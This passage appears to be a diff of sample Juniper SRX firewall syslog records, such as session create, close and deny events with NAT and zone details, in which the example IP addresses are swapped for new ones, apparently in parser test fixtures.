2018-10-07T01:32:20.898Z TestFW2 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.34 reason="idle Timeout" source-address="216.160.83.57" source-port="52890" destination-address="175.16.199.1" destination-port="53" service-name="junos-dns-udp" nat-source-address="175.16.199.1" nat-source-port="11152" nat-destination-address="58.68.126.198" nat-destination-port="53" src-nat-rule-type="source rule" src-nat-rule-name="NAT_S" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="NAT" source-zone-name="Gi_nat" destination-zone-name="Internet" session-id-32="220368889" packets-from-client="1" bytes-from-client="72" packets-from-server="1" bytes-from-server="136" elapsed-time="8" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth0.108" encrypted="UNKNOWN"] -<14>1 2018-06-30T02:17:22.753Z fw0001 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.41 reason="idle Timeout" source-address="216.160.83.57" source-port="62047" destination-address="175.16.199.1" destination-port="53" service-name="junos-dns-udp" nat-source-address="175.16.199.1" nat-source-port="20215" nat-destination-address="175.16.199.1" nat-destination-port="53" src-nat-rule-type="source rule" src-nat-rule-name="rule001" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="trust-to-untrust-001" source-zone-name="trust" destination-zone-name="untrust" session-id-32="9621" packets-from-client="1" bytes-from-client="67" packets-from-server="1" bytes-from-server="116" elapsed-time="3" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="fe-0/0/1.0" encrypted="UNKNOWN"] -<14>1 2015-09-25T14:19:53.846Z VPNBox-A RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.36 reason="application failure or action" source-address="216.160.83.57" source-port="9057" destination-address="175.16.199.1" destination-port="21" service-name="junos-ftp" nat-source-address="175.16.199.1" nat-source-port="58020" nat-destination-address="10.12.70.1" nat-destination-port="21" src-nat-rule-name="SNAT-Policy5" dst-nat-rule-name="NAT-Policy10" protocol-id="6" policy-name="FW-FTP" source-zone-name="trust" destination-zone-name="untrust" session-id-32="24311" packets-from-client="0" bytes-from-client="0" packets-from-server="0" bytes-from-server="0" elapsed-time="1" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth0.0" encrypted="No "] -<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CREATE [junos@2636.1.1.1.2.41 source-address="216.160.83.57" source-port="3129" destination-address="175.16.199.1" destination-port="21" service-name="junos-ftp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="175.16.199.1" nat-source-port="14406" nat-destination-address="207.17.137.56" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" username="N/A" roles="N/A" encrypted="N/A"] -<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.1.1.1.2.41 source-address="216.160.83.57" source-port="3129" destination-address="175.16.199.1" destination-port="21" service-name="junos-ftp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="175.16.199.1" nat-source-port="14406" nat-destination-address="207.17.137.56" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" packets-from-client="1" bytes-from-client="48" packets-from-server="0" bytes-from-server="0" elapsed-time="0" username="N/A" roles="N/A" encrypted="N/A"] -<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.1.1.1.2.41 reason="application failure or action" source-address="216.160.83.57" source-port="3129" destination-address="175.16.199.1" destination-port="21" service-name="junos-ftp" application="FTP" nested-application="UNKNOWN" nat-source-address="175.16.199.1" nat-source-port="14406" nat-destination-address="207.17.137.56" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" packets-from-client="3" bytes-from-client="144" packets-from-server="2" bytes-from-server="104" elapsed-time="1" username="N/A" roles="N/A" encrypted="N/A"] -<14>1 2013-01-19T15:18:18.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.1.1.1.2.129 source-address="216.160.83.57" source-port="33040" destination-address="175.16.199.1" destination-port="80" service-name="junos-http" application="HTTP" nested-application="FACEBOOK-SOCIALRSS" nat-source-address="175.16.199.1" nat-source-port="33040" nat-destination-address="5.0.0.1" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="28" packets-from-client="371" bytes-from-client="19592" packets-from-server="584" bytes-from-server="686432" elapsed-time="60" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”] -<14>1 2013-01-19T15:18:19.040 SRX100HM RT_FLOW - APPTRACK_SESSION_ROUTE_UPDATE [junos@2636.1.1.1.2.129 source-address="216.160.83.57" source-port="33040" destination-address="175.16.199.1" destination-port="80" service-name="junos-http" application="HTTP" nested-application="FACEBOOK-SOCIALRSS" nat-source-address="175.16.199.1" nat-source-port="33040" nat-destination-address="5.0.0.1" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="28" username="user1" roles="DEPT1" encrypted="No" profile-name=”pf1” rule-name=”facebook1” routing-instance=”instance1” destination-interface-name=”st0.0” apbr-rule-type=”default”] -<14>1 2013-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason="TCP CLIENT RST" source-address="216.160.83.57" source-port="48873" destination-address="175.16.199.1" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="175.16.199.1" nat-source-port="48873" nat-destination-address="5.0.0.1" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="32" packets-from-client="5" bytes-from-client="392" packets-from-server="3" bytes-from-server="646" elapsed-time="3" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”] -<14>1 2020-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE_LS [junos@2636.1.1.1.2.35 source-address="216.160.83.57" source-port="24065" destination-address="175.16.199.1" destination-port="768" service-name="icmp" nat-source-address="175.16.199.1" nat-source-port="24065" nat-destination-address="30.0.0.100" nat-destination-port="768" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="alg-policy" source-zone-name="untrust" destination-zone-name="trust" session-id-32="100000165" username="N/A" roles="N/A" packet-incoming-interface="reth2.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN"] -<14>1 2020-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY_LS [junos@2636.1.1.1.2.134 source-address="216.160.83.57" source-port="37233" destination-address="175.16.199.1" destination-port="161" connection-tag="0" service-name="None" protocol-id="17" icmp-type="0" policy-name="MgmtAccess-trust-cleanup" source-zone-name="trust" destination-zone-name="junos-host" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface=".local..0" encrypted="No" reason="Denied by policy" session-id-32="7087" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] -<14>1 2020-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE_LS [junos@2636.1.1.1.2.129 reason="TCP CLIENT RST" source-address="216.160.83.57" source-port="48873" destination-address="175.16.199.1" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="175.16.199.1" nat-source-port="48873" nat-destination-address="5.0.0.1" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="32" packets-from-client="5" bytes-from-client="392" packets-from-server="3" bytes-from-server="646" elapsed-time="3" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”] -<14>1 2020-07-14T14:17:11.928Z SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.1.1.1.2.129 source-address="216.160.83.57" source-port="58943" destination-address="175.16.199.1" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="175.16.199.1" nat-source-port="6018" nat-destination-address="175.16.199.1" nat-destination-port="80" src-nat-rule-name="our-nat-rule" dst-nat-rule-name="N/A" protocol-id="6" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="16118" packets-from-client="42" bytes-from-client="2322" packets-from-server="34" bytes-from-server="2132" elapsed-time="60" username="N/A" roles="N/A" encrypted="No" destination-interface-name="ge-0/0/0.0" category="N/A" sub-category="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"] -<14>1 2020-07-13T16:43:05.041Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason="idle Timeout" source-address="216.160.83.57" source-port="64720" destination-address="175.16.199.1" destination-port="8883" connection-tag="0" service-name="None" nat-source-address="175.16.199.1" nat-source-port="24519" nat-destination-address="175.16.199.1" nat-destination-port="8883" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="our-nat-rule" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="3851" packets-from-client="161" bytes-from-client="9530" packets-from-server="96" bytes-from-server="9670" elapsed-time="23755" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/1.0" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A" secure-web-proxy-session-type="NA" peer-session-id="0" peer-source-address="0.0.0.0" peer-source-port="0" peer-destination-address="0.0.0.0" peer-destination-port="0" hostname="NA NA" src-vrf-grp="N/A" dst-vrf-grp="N/A"] -<14>1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.129 source-address="216.160.83.57" source-port="49583" destination-address="175.16.199.1" destination-port="53" connection-tag="0" service-name="junos-dns-udp" nat-source-address="175.16.199.1" nat-source-port="30838" nat-destination-address="175.16.199.1" nat-destination-port="53" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="our-nat-rule" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="15399" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/1.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"] -<14>1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason="Closed by junos-alg" source-address="216.160.83.57" source-port="63381" destination-address="175.16.199.1" destination-port="53" service-name="junos-dns-udp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="175.16.199.1" nat-source-port="26764" nat-destination-address="175.16.199.1" nat-destination-port="53" src-nat-rule-name="our-nat-rule" dst-nat-rule-name="N/A" protocol-id="17" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="15361" packets-from-client="1" bytes-from-client="66" packets-from-server="1" bytes-from-server="82" elapsed-time="3" username="N/A" roles="N/A" encrypted="No" profile-name="N/A" rule-name="N/A" routing-instance="default" destination-interface-name="ge-0/0/0.0" uplink-incoming-interface-name="N/A" uplink-tx-bytes="0" uplink-rx-bytes="0" category="N/A" sub-category="N/A" apbr-policy-name="N/A" multipath-rule-name="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"] +<14>1 2019-11-14T09:37:51.184+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address="10.0.0.1" source-port="594" destination-address="67.43.156.13" destination-port="10400" connection-tag="0" service-name="icmp" nat-source-address="10.0.0.1" nat-source-port="594" nat-destination-address="67.43.156.13" nat-destination-port="10400" nat-connection-tag="0" src-nat-rule-type="N/A" src-nat-rule-name="N/A" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="1" policy-name="vpn_trust_permit-all" source-zone-name="vpn" destination-zone-name="trust" session-id-32="6093" username="N/A" roles="N/A" packet-incoming-interface="st0.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] +<14>1 2019-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY [junos@67.43.156.15 source-address="10.0.0.26" source-port="37233" destination-address="67.43.156.13" destination-port="161" connection-tag="0" service-name="None" protocol-id="17" icmp-type="0" policy-name="MgmtAccess-trust-cleanup" source-zone-name="trust" destination-zone-name="junos-host" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface=".local..0" encrypted="No" reason="Denied by policy" session-id-32="7087" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] +<14>1 2014-05-01T08:26:51.179Z fw01 RT_FLOW - RT_FLOW_SESSION_DENY [junos@67.43.156.15 source-address="67.43.156.15" source-port="56639" destination-address="67.43.156.15" destination-port="2003" service-name="None" protocol-id="6" icmp-type="0" policy-name="log-all-else" source-zone-name="campus" destination-zone-name="mngmt" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth6.0" encrypted="No "] +<14>1 2014-05-01T08:28:10.933Z fw01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="unset" source-address="67.43.156.15" source-port="63456" destination-address="67.43.156.15" destination-port="902" service-name="None" nat-source-address="67.43.156.15" nat-source-port="63456" nat-destination-address="67.43.156.15" nat-destination-port="902" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="17" policy-name="mngmt-to-vcenter" source-zone-name="mngmt" destination-zone-name="intra" session-id-32="15353" packets-from-client="1" bytes-from-client="94" packets-from-server="0" bytes-from-server="0" elapsed-time="60" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth3.5" encrypted="No "] +<14>1 2013-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address="67.43.156.14" source-port="24065" destination-address="67.43.156.14" destination-port="768" service-name="icmp" nat-source-address="67.43.156.14" nat-source-port="24065" nat-destination-address="67.43.156.14" nat-destination-port="768" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="alg-policy" source-zone-name="untrust" destination-zone-name="trust" session-id-32="100000165" username="N/A" roles="N/A" packet-incoming-interface="reth2.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN"] +<14>1 2010-09-30T14:55:04.323+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address="192.168.2.1" source-port="1" destination-address="192.168.100.12" destination-port="46384" service-name="icmp" nat-source-address="192.168.2.1" nat-source-port="1" nat-destination-address="67.43.156.14" nat-destination-port="46384" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="policy1" source-zone-name="trustZone" destination-zone-name="untrustZone" session-id-32="41" packet-incoming-interface="ge-0/0/1.0"] +<14>1 2010-09-30T14:55:07.188+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="response received" source-address="192.168.2.1" source-port="1" destination-address="192.168.100.12" destination-port="46384" service-name="icmp" nat-source-address="192.168.2.1" nat-source-port="1" nat-destination-address="67.43.156.14" nat-destination-port="46384" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="policy1" source-zone-name="trustZone" destination-zone-name="untrustZone" session-id-32="41" packets-from-client="1" bytes-from-client="84" packets-from-server="1" bytes-from-server="84" elapsed-time="0" packet-incoming-interface="ge-0/0/1.0"] +<14>1 2019-04-12T14:29:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="TCP FIN" source-address="10.3.255.203" source-port="47776" destination-address="67.43.156.15" destination-port="80" connection-tag="0" service-name="junos-http" nat-source-address="10.3.136.49" nat-source-port="19162" nat-destination-address="67.43.156.15" nat-destination-port="80" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="nat1" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit_all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="5" packets-from-client="6" bytes-from-client="337" packets-from-server="4" bytes-from-server="535" elapsed-time="1" application="HTTP" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/0.0" encrypted="No" application-category="Web" application-sub-category="N/A" application-risk="4" application-characteristics="Can Leak Information;Supports File Transfer;Prone to Misuse;Known Vulnerabilities;Carrier of Malware;Capable of Tunneling;"] +<14>1 2019-04-13T14:33:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="TCP RST" source-address="192.168.2.164" source-port="53232" destination-address="172.16.1.19" destination-port="445" service-name="junos-smb" nat-source-address="192.168.2.164" nat-source-port="53232" nat-destination-address="172.16.1.19" nat-destination-port="445" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="6" policy-name="35" source-zone-name="Trust" destination-zone-name="Trust" session-id-32="206" packets-from-client="13" bytes-from-client="4274" packets-from-server="9" bytes-from-server="1575" elapsed-time="16" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/2.0"] +<14>1 2018-10-07T01:32:20.898Z TestFW2 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="idle Timeout" source-address="67.43.156.14" source-port="52890" destination-address="67.43.156.14" destination-port="53" service-name="junos-dns-udp" nat-source-address="67.43.156.14" nat-source-port="11152" nat-destination-address="67.43.156.14" nat-destination-port="53" src-nat-rule-type="source rule" src-nat-rule-name="NAT_S" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="NAT" source-zone-name="Gi_nat" destination-zone-name="Internet" session-id-32="220368889" packets-from-client="1" bytes-from-client="72" packets-from-server="1" bytes-from-server="136" elapsed-time="8" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth0.108" encrypted="UNKNOWN"] +<14>1 2018-06-30T02:17:22.753Z fw0001 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="idle Timeout" source-address="192.168.255.2" source-port="62047" destination-address="67.43.156.15" destination-port="53" service-name="junos-dns-udp" nat-source-address="192.168.0.47" nat-source-port="20215" nat-destination-address="67.43.156.15" nat-destination-port="53" src-nat-rule-type="source rule" src-nat-rule-name="rule001" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="trust-to-untrust-001" source-zone-name="trust" destination-zone-name="untrust" session-id-32="9621" packets-from-client="1" bytes-from-client="67" packets-from-server="1" bytes-from-server="116" elapsed-time="3" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="fe-0/0/1.0" encrypted="UNKNOWN"] +<14>1 2015-09-25T14:19:53.846Z VPNBox-A RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="application failure or action" source-address="10.164.110.223" source-port="9057" destination-address="10.104.12.161" destination-port="21" service-name="junos-ftp" nat-source-address="10.9.1.150" nat-source-port="58020" nat-destination-address="10.12.70.1" nat-destination-port="21" src-nat-rule-name="SNAT-Policy5" dst-nat-rule-name="NAT-Policy10" protocol-id="6" policy-name="FW-FTP" source-zone-name="trust" destination-zone-name="untrust" session-id-32="24311" packets-from-client="0" bytes-from-client="0" packets-from-server="0" bytes-from-server="0" elapsed-time="1" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth0.0" encrypted="No "] +<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CREATE [junos@67.43.156.15 source-address="192.168.224.30" source-port="3129" destination-address="67.43.156.14" destination-port="21" service-name="junos-ftp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="67.43.156.14" nat-source-port="14406" nat-destination-address="67.43.156.14" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" username="N/A" roles="N/A" encrypted="N/A"] +<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@67.43.156.15 source-address="192.168.224.30" source-port="3129" destination-address="67.43.156.14" destination-port="21" service-name="junos-ftp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="67.43.156.14" nat-source-port="14406" nat-destination-address="67.43.156.14" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" packets-from-client="1" bytes-from-client="48" packets-from-server="0" bytes-from-server="0" elapsed-time="0" username="N/A" roles="N/A" encrypted="N/A"] +<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@67.43.156.15 reason="application failure or action" source-address="192.168.224.30" source-port="3129" destination-address="67.43.156.14" destination-port="21" service-name="junos-ftp" application="FTP" nested-application="UNKNOWN" nat-source-address="67.43.156.14" nat-source-port="14406" nat-destination-address="67.43.156.14" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" packets-from-client="3" bytes-from-client="144" packets-from-server="2" bytes-from-server="104" elapsed-time="1" username="N/A" roles="N/A" encrypted="N/A"] +<14>1 2013-01-19T15:18:18.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@67.43.156.15 source-address="67.43.156.14" source-port="33040" destination-address="67.43.156.15" destination-port="80" service-name="junos-http" application="HTTP" nested-application="FACEBOOK-SOCIALRSS" nat-source-address="67.43.156.14" nat-source-port="33040" nat-destination-address="67.43.156.15" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="28" packets-from-client="371" bytes-from-client="19592" packets-from-server="584" bytes-from-server="686432" elapsed-time="60" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”] +<14>1 2013-01-19T15:18:19.040 SRX100HM RT_FLOW - APPTRACK_SESSION_ROUTE_UPDATE [junos@67.43.156.15 source-address="67.43.156.14" source-port="33040" destination-address="67.43.156.15" destination-port="80" service-name="junos-http" application="HTTP" nested-application="FACEBOOK-SOCIALRSS" nat-source-address="67.43.156.14" nat-source-port="33040" nat-destination-address="67.43.156.15" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="28" username="user1" roles="DEPT1" encrypted="No" profile-name=”pf1” rule-name=”facebook1” routing-instance=”instance1” destination-interface-name=”st0.0” apbr-rule-type=”default”] +<14>1 2013-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@67.43.156.15 reason="TCP CLIENT RST" source-address="67.43.156.14" source-port="48873" destination-address="67.43.156.15" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="67.43.156.14" nat-source-port="48873" nat-destination-address="67.43.156.15" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="32" packets-from-client="5" bytes-from-client="392" packets-from-server="3" bytes-from-server="646" elapsed-time="3" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”] +<14>1 2020-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE_LS [junos@67.43.156.15 source-address="67.43.156.14" source-port="24065" destination-address="67.43.156.14" destination-port="768" service-name="icmp" nat-source-address="67.43.156.14" nat-source-port="24065" nat-destination-address="67.43.156.14" nat-destination-port="768" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="alg-policy" source-zone-name="untrust" destination-zone-name="trust" session-id-32="100000165" username="N/A" roles="N/A" packet-incoming-interface="reth2.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN"] +<14>1 2020-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY_LS [junos@67.43.156.15 source-address="10.0.0.26" source-port="37233" destination-address="67.43.156.13" destination-port="161" connection-tag="0" service-name="None" protocol-id="17" icmp-type="0" policy-name="MgmtAccess-trust-cleanup" source-zone-name="trust" destination-zone-name="junos-host" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface=".local..0" encrypted="No" reason="Denied by policy" session-id-32="7087" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"] +<14>1 2020-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE_LS [junos@67.43.156.15 reason="TCP CLIENT RST" source-address="67.43.156.14" source-port="48873" destination-address="67.43.156.15" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="67.43.156.14" nat-source-port="48873" nat-destination-address="67.43.156.15" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="32" packets-from-client="5" bytes-from-client="392" packets-from-server="3" bytes-from-server="646" elapsed-time="3" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”] +<14>1 2020-07-14T14:17:11.928Z SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@67.43.156.15 source-address="10.1.1.100" source-port="58943" destination-address="67.43.156.14" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="172.19.34.100" nat-source-port="6018" nat-destination-address="67.43.156.14" nat-destination-port="80" src-nat-rule-name="our-nat-rule" dst-nat-rule-name="N/A" protocol-id="6" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="16118" packets-from-client="42" bytes-from-client="2322" packets-from-server="34" bytes-from-server="2132" elapsed-time="60" username="N/A" roles="N/A" encrypted="No" destination-interface-name="ge-0/0/0.0" category="N/A" sub-category="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"] +<14>1 2020-07-13T16:43:05.041Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason="idle Timeout" source-address="10.1.1.100" source-port="64720" destination-address="67.43.156.15" destination-port="8883" connection-tag="0" service-name="None" nat-source-address="172.19.34.100" nat-source-port="24519" nat-destination-address="67.43.156.15" nat-destination-port="8883" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="our-nat-rule" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="3851" packets-from-client="161" bytes-from-client="9530" packets-from-server="96" bytes-from-server="9670" elapsed-time="23755" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/1.0" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A" secure-web-proxy-session-type="NA" peer-session-id="0" peer-source-address="0.0.0.0" peer-source-port="0" peer-destination-address="0.0.0.0" peer-destination-port="0" hostname="NA NA" src-vrf-grp="N/A" dst-vrf-grp="N/A"] +<14>1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address="10.1.1.100" source-port="49583" destination-address="67.43.156.15" destination-port="53" connection-tag="0" service-name="junos-dns-udp" nat-source-address="172.19.34.100" nat-source-port="30838" nat-destination-address="67.43.156.15" nat-destination-port="53" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="our-nat-rule" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="15399" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/1.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"] +<14>1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@67.43.156.15 reason="Closed by junos-alg" source-address="10.1.1.100" source-port="63381" destination-address="67.43.156.15" 